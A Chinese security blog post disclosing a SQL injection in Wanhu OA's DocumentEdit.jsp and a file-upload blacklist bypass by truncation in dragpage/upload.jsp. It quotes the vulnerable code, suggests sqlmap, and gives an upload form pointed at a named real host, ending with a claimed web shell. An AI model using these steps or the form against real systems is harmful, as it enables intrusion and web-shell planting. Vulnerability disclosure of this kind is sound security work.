sql注入:    万户OA某处无限制sql注入 :http://www.2cto.com/Article/201409/332916.html   里面的方法适用于标准版,专业版存在同样的文件但是路径不一样。   defaultroot\iWebRevision.jsp\DocumentEdit.jsp    

if (ObjConnBean.OpenConnection()) {

  System.out.println("OpenConnection");

  String Sql="Select * From Document Where RecordID='"+ RecordID + "'";

  ResultSet rs = null;

  rs = ObjConnBean.ExecuteQuery(Sql);

 

  专业版使用的数据库是oracle所以poc不能用了,直接上sqlmap吧。 万户OA某处绕过限制文件上传以及sql注入 – 网站安插图   这样两个版本都通杀了,不知道这系统为什么要一个文件到处放。   文件上传:(这 漏洞两个版本都适用的)   defaultroot/dragpage/upload. jsp     代码里是有过滤,但是看通过截断绕过setAllowedFilesList方法的黑名单限制  

// Initialization

mySmartUpload.initialize(pageContext);



//mySmartUpload.setTotalMaxFileSize(100000);

mySmartUpload.setAllowedFilesList("jpg,gif,bmp,swf,avi");

// Upload 

mySmartUpload.upload();

 

    构造一个上传文件  

<form id="frmUpload" enctype="multipart/form-data" action="http://oa.china-sss.com/defaultroot/dragpage/upload.jsp" method="post">

Upload a new file:<br>

<input type="file" name="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">FileUpload

</form>

 

  然后抓包截断   万户OA某处绕过限制文件上传以及sql注入 – 网站安插图1     shell到手~  

万户OA某处绕过限制文件上传以及sql注入 – 网站安插图2
万户OA某处绕过限制文件上传以及sql注入 – 网站安插图3

    上一篇: Discuz后台文件包含漏洞 - 网站安全 - 自学php

    下一篇: 百度开放平台某SQL注入 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《万户OA某处绕过限制文件上传以及sql注入 – 网站安
   

还没有人抢沙发呢~